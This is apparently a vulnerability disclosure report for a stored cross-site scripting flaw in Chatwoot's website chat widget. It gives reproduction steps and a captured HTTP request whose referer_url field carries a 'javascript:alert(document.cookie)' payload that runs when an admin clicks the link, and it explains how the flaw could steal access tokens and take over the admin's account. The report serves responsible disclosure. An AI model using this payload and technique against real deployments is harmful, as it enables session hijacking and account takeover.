BUG

Stored xss via referer url allow to hijack victim access-token

STEP TO REPRODUCE

1. From admin account goto https://app.chatwoot.com/app/accounts/42689/settings/inboxes/list and create a inbox of type website .
   Now get you configuration script from this inbox and save in html file .\

2. Now as a exeternal user view the above file and send a support chat messega while capturing it in burpsuite. Here bellow request is sent to server

POST /api/v1/widget/messages?website_token=6vsdbdaUQu21bnz3oFwhqQhW&locale=en HTTP/1.1
Host: app.chatwoot.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://app.chatwoot.com/widget?website_token=6vsdbdaUQu21bnz3oFwhqQhW
X-Auth-Token: eyJhbGciOiJIUzI1NiJ9.eyJzb3VyY2VfaWQiOiJlNDFhMWZiOC02MDk5LTQzZGQtOGUwYy0zMDRhODYzOTJmNGEiLCJpbmJveF9pZCI6MTEzNTZ9.cLoOIpAX0qWmbbLDVm3hCUb2DlmPJcwP9DJC-F8zSs8
Content-Type: application/json
Content-Length: 161
Origin: https://app.chatwoot.com
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"message":{"content":"xss via referer","timestamp":"Sat Feb 12 2022 21:56:37 GMT+0530 (India Standard Time)","referer_url":"javascript:alert(document.cookie)"}}

Here in this request i changed referer_url parameter value to javascript:alert(document.cookie) and forward the request .
Now a support message will be created .
3. Now from admin view the above chat message and CONTROL+CLick the referer link and see xss is executed

Video Poc

https://drive.google.com/file/d/1eQmGL0pvcaEcmRG_Tv0sA6-uznId7WYC/view?usp=sharing

IMPACT

I see chatwoot authenticate user using this header Access-Token,Token-Type,Client,Expiry,Uid .
And those value present in cookie auth_data .
So,using this xss cookie can be steal and also access token can be steal and using those token attacker can control victim acccount